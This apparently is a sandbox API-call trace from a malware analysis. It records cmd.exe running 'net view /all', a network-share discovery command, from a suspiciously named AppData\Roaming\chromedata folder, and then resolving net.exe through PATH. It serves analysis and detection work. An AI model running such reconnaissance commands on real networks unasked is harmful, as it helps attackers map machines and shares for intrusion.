	[0239.211] GetCommandLineW () returned="/c net view /all"
	[0239.212] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e15260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0239.212] GetProcessHeap () returned 0x240000
	[0239.212] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x210) returned 0x251d10
	[0239.212] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x251d18, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0239.212] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0239.212] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0239.212] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0239.212] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0239.212] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0239.212] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0239.212] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0239.212] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0239.212] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0239.212] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0239.212] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0239.212] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0239.212] GetProcessHeap () returned 0x240000
	[0239.212] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x250b00 | out: hHeap=0x240000) returned 1
	[0239.212] GetEnvironmentStringsW () returned 0x2501f8*
	[0239.212] GetProcessHeap () returned 0x240000
	[0239.212] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x912) returned 0x252848
	[0239.213] FreeEnvironmentStringsW (penv=0x2501f8) returned 1
	[0239.213] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0239.213] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0239.213] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0239.213] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0239.213] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0239.213] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0239.213] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0239.213] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0239.213] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0239.213] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0239.213] GetProcessHeap () returned 0x240000
	[0239.213] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x6a) returned 0x2407f0
	[0239.213] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ff488 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0239.213] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", nBufferLength=0x104, lpBuffer=0x1ff488, lpFilePart=0x1ff484 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x1ff484*="chromedata") returned 0x30
	[0239.213] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0239.213] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ff204 | out: lpFindFileData=0x1ff204*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x250078
	[0239.213] FindClose (in: hFindFile=0x250078 | out: hFindFile=0x250078) returned 1
	[0239.213] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc", lpFindFileData=0x1ff204 | out: lpFindFileData=0x1ff204*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XC7u663GxWc", cAlternateFileName="2XC7U6~1")) returned 0x250078
	[0239.214] FindClose (in: hFindFile=0x250078 | out: hFindFile=0x250078) returned 1
	[0239.214] _wcsnicmp (_String1="2XC7U6~1", _String2="2XC7u663GxWc", _MaxCount=0xc) returned 72
	[0239.214] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData", lpFindFileData=0x1ff204 | out: lpFindFileData=0x1ff204*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc173b540, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x250078
	[0239.214] FindClose (in: hFindFile=0x250078 | out: hFindFile=0x250078) returned 1
	[0239.214] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming", lpFindFileData=0x1ff204 | out: lpFindFileData=0x1ff204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0x78fd700, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x78fd700, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x250078
	[0239.214] FindClose (in: hFindFile=0x250078 | out: hFindFile=0x250078) returned 1
	[0239.214] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFindFileData=0x1ff204 | out: lpFindFileData=0x1ff204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x78fd700, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x744be640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x744be640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="chromedata", cAlternateFileName="CHROME~1")) returned 0x250078
	[0239.214] FindClose (in: hFindFile=0x250078 | out: hFindFile=0x250078) returned 1
	[0239.214] _wcsnicmp (_String1="CHROME~1", _String2="chromedata", _MaxCount=0xa) returned 26
	[0239.214] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0239.214] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 1
	[0239.214] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 1
	[0239.214] GetProcessHeap () returned 0x240000
	[0239.214] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x252848 | out: hHeap=0x240000) returned 1
	[0239.214] GetEnvironmentStringsW () returned 0x2501f8*
	[0239.215] GetProcessHeap () returned 0x240000
	[0239.215] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x97c) returned 0x251f28
	[0239.215] FreeEnvironmentStringsW (penv=0x2501f8) returned 1
	[0239.215] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e15260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0239.215] GetProcessHeap () returned 0x240000
	[0239.215] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2407f0 | out: hHeap=0x240000) returned 1
	[0239.215] GetProcessHeap () returned 0x240000
	[0239.215] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x400e) returned 0x253af0
	[0239.215] GetProcessHeap () returned 0x240000
	[0239.215] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x28) returned 0x250078
	[0239.215] GetProcessHeap () returned 0x240000
	[0239.215] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x253af0 | out: hHeap=0x240000) returned 1
	[0239.215] GetConsoleOutputCP () returned 0x1b5
	[0239.215] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0239.215] GetUserDefaultLCID () returned 0x409
	[0239.215] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e14950, cchData=8 | out: lpLCData=":") returned 2
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ff5c8, cchData=128 | out: lpLCData="0") returned 2
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ff5c8, cchData=128 | out: lpLCData="0") returned 2
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ff5c8, cchData=128 | out: lpLCData="1") returned 2
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e14940, cchData=8 | out: lpLCData="/") returned 2
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e14d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e14d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e14d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e14cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e14c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e14c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e14c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e14930, cchData=8 | out: lpLCData=".") returned 2
	[0239.216] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e14920, cchData=8 | out: lpLCData=",") returned 2
	[0239.216] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0239.217] GetProcessHeap () returned 0x240000
	[0239.217] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x20c) returned 0x2528e8
	[0239.217] GetConsoleTitleW (in: lpConsoleTitle=0x2528e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0239.217] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0239.217] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0239.217] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0239.217] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0239.218] GetProcessHeap () returned 0x240000
	[0239.218] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x400a) returned 0x253af0
	[0239.218] GetProcessHeap () returned 0x240000
	[0239.218] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x253af0 | out: hHeap=0x240000) returned 1
	[0239.218] _wcsicmp (_String1="net", _String2=")") returned 69
	[0239.218] _wcsicmp (_String1="FOR", _String2="net") returned -8
	[0239.218] _wcsicmp (_String1="FOR/?", _String2="net") returned -8
	[0239.218] _wcsicmp (_String1="IF", _String2="net") returned -5
	[0239.218] _wcsicmp (_String1="IF/?", _String2="net") returned -5
	[0239.218] _wcsicmp (_String1="REM", _String2="net") returned 4
	[0239.218] _wcsicmp (_String1="REM/?", _String2="net") returned 4
	[0239.218] GetProcessHeap () returned 0x240000
	[0239.218] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x58) returned 0x252b00
	[0239.218] GetProcessHeap () returned 0x240000
	[0239.218] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x10) returned 0x24d540
	[0239.218] GetProcessHeap () returned 0x240000
	[0239.218] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1e) returned 0x24e8a8
	[0239.219] GetConsoleTitleW (in: lpConsoleTitle=0x1ff2c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0239.219] _wcsicmp (_String1="net", _String2="DIR") returned 10
	[0239.219] _wcsicmp (_String1="net", _String2="ERASE") returned 9
	[0239.219] _wcsicmp (_String1="net", _String2="DEL") returned 10
	[0239.219] _wcsicmp (_String1="net", _String2="TYPE") returned -6
	[0239.219] _wcsicmp (_String1="net", _String2="COPY") returned 11
	[0239.219] _wcsicmp (_String1="net", _String2="CD") returned 11
	[0239.219] _wcsicmp (_String1="net", _String2="CHDIR") returned 11
	[0239.219] _wcsicmp (_String1="net", _String2="RENAME") returned -4
	[0239.219] _wcsicmp (_String1="net", _String2="REN") returned -4
	[0239.219] _wcsicmp (_String1="net", _String2="ECHO") returned 9
	[0239.219] _wcsicmp (_String1="net", _String2="SET") returned -5
	[0239.219] _wcsicmp (_String1="net", _String2="PAUSE") returned -2
	[0239.219] _wcsicmp (_String1="net", _String2="DATE") returned 10
	[0239.219] _wcsicmp (_String1="net", _String2="TIME") returned -6
	[0239.219] _wcsicmp (_String1="net", _String2="PROMPT") returned -2
	[0239.219] _wcsicmp (_String1="net", _String2="MD") returned 1
	[0239.219] _wcsicmp (_String1="net", _String2="MKDIR") returned 1
	[0239.219] _wcsicmp (_String1="net", _String2="RD") returned -4
	[0239.219] _wcsicmp (_String1="net", _String2="RMDIR") returned -4
	[0239.219] _wcsicmp (_String1="net", _String2="PATH") returned -2
	[0239.219] _wcsicmp (_String1="net", _String2="GOTO") returned 7
	[0239.219] _wcsicmp (_String1="net", _String2="SHIFT") returned -5
	[0239.219] _wcsicmp (_String1="net", _String2="CLS") returned 11
	[0239.219] _wcsicmp (_String1="net", _String2="CALL") returned 11
	[0239.219] _wcsicmp (_String1="net", _String2="VERIFY") returned -8
	[0239.220] _wcsicmp (_String1="net", _String2="VER") returned -8
	[0239.220] _wcsicmp (_String1="net", _String2="VOL") returned -8
	[0239.220] _wcsicmp (_String1="net", _String2="EXIT") returned 9
	[0239.220] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5
	[0239.220] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9
	[0239.220] _wcsicmp (_String1="net", _String2="TITLE") returned -6
	[0239.220] _wcsicmp (_String1="net", _String2="START") returned -5
	[0239.220] _wcsicmp (_String1="net", _String2="DPATH") returned 10
	[0239.220] _wcsicmp (_String1="net", _String2="KEYS") returned 3
	[0239.220] _wcsicmp (_String1="net", _String2="MOVE") returned 1
	[0239.220] _wcsicmp (_String1="net", _String2="PUSHD") returned -2
	[0239.220] _wcsicmp (_String1="net", _String2="POPD") returned -2
	[0239.220] _wcsicmp (_String1="net", _String2="ASSOC") returned 13
	[0239.220] _wcsicmp (_String1="net", _String2="FTYPE") returned 8
	[0239.220] _wcsicmp (_String1="net", _String2="BREAK") returned 12
	[0239.220] _wcsicmp (_String1="net", _String2="COLOR") returned 11
	[0239.220] _wcsicmp (_String1="net", _String2="MKLINK") returned 1
	[0239.220] _wcsicmp (_String1="net", _String2="DIR") returned 10
	[0239.220] _wcsicmp (_String1="net", _String2="ERASE") returned 9
	[0239.220] _wcsicmp (_String1="net", _String2="DEL") returned 10
	[0239.220] _wcsicmp (_String1="net", _String2="TYPE") returned -6
	[0239.220] _wcsicmp (_String1="net", _String2="COPY") returned 11
	[0239.220] _wcsicmp (_String1="net", _String2="CD") returned 11
	[0239.220] _wcsicmp (_String1="net", _String2="CHDIR") returned 11
	[0239.220] _wcsicmp (_String1="net", _String2="RENAME") returned -4
	[0239.220] _wcsicmp (_String1="net", _String2="REN") returned -4
	[0239.220] _wcsicmp (_String1="net", _String2="ECHO") returned 9
	[0239.220] _wcsicmp (_String1="net", _String2="SET") returned -5
	[0239.220] _wcsicmp (_String1="net", _String2="PAUSE") returned -2
	[0239.220] _wcsicmp (_String1="net", _String2="DATE") returned 10
	[0239.220] _wcsicmp (_String1="net", _String2="TIME") returned -6
	[0239.220] _wcsicmp (_String1="net", _String2="PROMPT") returned -2
	[0239.220] _wcsicmp (_String1="net", _String2="MD") returned 1
	[0239.220] _wcsicmp (_String1="net", _String2="MKDIR") returned 1
	[0239.220] _wcsicmp (_String1="net", _String2="RD") returned -4
	[0239.220] _wcsicmp (_String1="net", _String2="RMDIR") returned -4
	[0239.220] _wcsicmp (_String1="net", _String2="PATH") returned -2
	[0239.220] _wcsicmp (_String1="net", _String2="GOTO") returned 7
	[0239.220] _wcsicmp (_String1="net", _String2="SHIFT") returned -5
	[0239.220] _wcsicmp (_String1="net", _String2="CLS") returned 11
	[0239.220] _wcsicmp (_String1="net", _String2="CALL") returned 11
	[0239.220] _wcsicmp (_String1="net", _String2="VERIFY") returned -8
	[0239.220] _wcsicmp (_String1="net", _String2="VER") returned -8
	[0239.221] _wcsicmp (_String1="net", _String2="VOL") returned -8
	[0239.221] _wcsicmp (_String1="net", _String2="EXIT") returned 9
	[0239.221] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5
	[0239.221] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9
	[0239.221] _wcsicmp (_String1="net", _String2="TITLE") returned -6
	[0239.221] _wcsicmp (_String1="net", _String2="START") returned -5
	[0239.221] _wcsicmp (_String1="net", _String2="DPATH") returned 10
	[0239.221] _wcsicmp (_String1="net", _String2="KEYS") returned 3
	[0239.221] _wcsicmp (_String1="net", _String2="MOVE") returned 1
	[0239.221] _wcsicmp (_String1="net", _String2="PUSHD") returned -2
	[0239.221] _wcsicmp (_String1="net", _String2="POPD") returned -2
	[0239.221] _wcsicmp (_String1="net", _String2="ASSOC") returned 13
	[0239.221] _wcsicmp (_String1="net", _String2="FTYPE") returned 8
	[0239.221] _wcsicmp (_String1="net", _String2="BREAK") returned 12
	[0239.221] _wcsicmp (_String1="net", _String2="COLOR") returned 11
	[0239.221] _wcsicmp (_String1="net", _String2="MKLINK") returned 1
	[0239.221] _wcsicmp (_String1="net", _String2="FOR") returned 8
	[0239.221] _wcsicmp (_String1="net", _String2="IF") returned 5
	[0239.221] _wcsicmp (_String1="net", _String2="REM") returned -4
	[0239.221] GetProcessHeap () returned 0x240000
	[0239.221] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x210) returned 0x252b60
	[0239.221] GetProcessHeap () returned 0x240000
	[0239.221] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x26) returned 0x252d78
	[0239.221] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11
	[0239.221] GetProcessHeap () returned 0x240000
	[0239.221] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x418) returned 0x2407f0
	[0239.221] SetErrorMode (uMode=0x0) returned 0x8001
	[0239.221] SetErrorMode (uMode=0x1) returned 0x0
	[0239.221] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2407f8, lpFilePart=0x1fede0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x1fede0*="chromedata") returned 0x30
	[0239.221] SetErrorMode (uMode=0x8001) returned 0x1
	[0239.221] GetProcessHeap () returned 0x240000
	[0239.221] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x2407f0, Size=0x72) returned 0x2407f0
	[0239.222] GetProcessHeap () returned 0x240000
	[0239.222] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x2407f0) returned 0x72
	[0239.222] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0239.222] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0239.222] GetProcessHeap () returned 0x240000
	[0239.222] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x17e) returned 0x252da8
	[0239.222] GetProcessHeap () returned 0x240000
	[0239.222] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2f4) returned 0x240870
	[0239.227] GetProcessHeap () returned 0x240000
	[0239.227] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x240870, Size=0x180) returned 0x240870
	[0239.227] GetProcessHeap () returned 0x240000
	[0239.227] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x240870) returned 0x180
	[0239.227] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0239.227] GetProcessHeap () returned 0x240000
	[0239.227] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe0) returned 0x252f30
	[0239.227] GetProcessHeap () returned 0x240000
	[0239.227] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x252f30, Size=0x76) returned 0x252f30
	[0239.227] GetProcessHeap () returned 0x240000
	[0239.227] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x252f30) returned 0x76
	[0239.228] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0239.228] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1feb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1feb5c) returned 0xffffffff
	[0239.229] GetLastError () returned 0x2
	[0239.229] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\net", fInfoLevelId=0x1, lpFindFileData=0x1feb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1feb5c) returned 0xffffffff
	[0239.229] GetLastError () returned 0x2
	[0239.229] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0239.229] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1feb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1feb5c) returned 0xffffffff
	[0239.229] GetLastError () returned 0x2
	[0239.229] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\net", fInfoLevelId=0x1, lpFindFileData=0x1feb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1feb5c) returned 0xffffffff
	[0239.230] GetLastError () returned 0x2
	[0239.230] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0239.230] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1feb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1feb5c) returned 0x252fb0
	[0239.230] GetProcessHeap () returned 0x240000
	[0239.230] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x14) returned 0x2500a8
	[0239.230] FindClose (in: hFindFile=0x252fb0 | out: hFindFile=0x252fb0) returned 1
	[0239.230] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x1feb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1feb5c) returned 0xffffffff
	[0239.230] GetLastError () returned 0x2
	[0239.230] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x1feb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1feb5c) returned 0x252fb0
	[0239.230] GetProcessHeap () returned 0x240000
	[0239.230] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x2500a8, Size=0x4) returned 0x2500a8
	[0239.230] FindClose (in: hFindFile=0x252fb0 | out: hFindFile=0x252fb0) returned 1
	[0239.231] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0239.231] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0239.231] GetConsoleTitleW (in: lpConsoleTitle=0x1ff054, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0239.231] InitializeProcThreadAttributeList (in: lpAttributeList=0x1feedc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1fefa4 | out: lpAttributeList=0x1feedc, lpSize=0x1fefa4) returned 1
	[0239.231] UpdateProcThreadAttribute (in: lpAttributeList=0x1feedc, dwFlags=0x0, Attribute=0x60001, lpValue=0x1fef9c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1feedc, lpPreviousValue=0x0) returned 1
	[0239.231] GetStartupInfoW (in: lpStartupInfo=0x1fee98 | out: lpStartupInfo=0x1fee98*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x15c, hStdOutput=0x158, hStdError=0x158)) 
	[0239.231] GetProcessHeap () returned 0x240000
	[0239.231] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x18) returned 0x252fb0
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
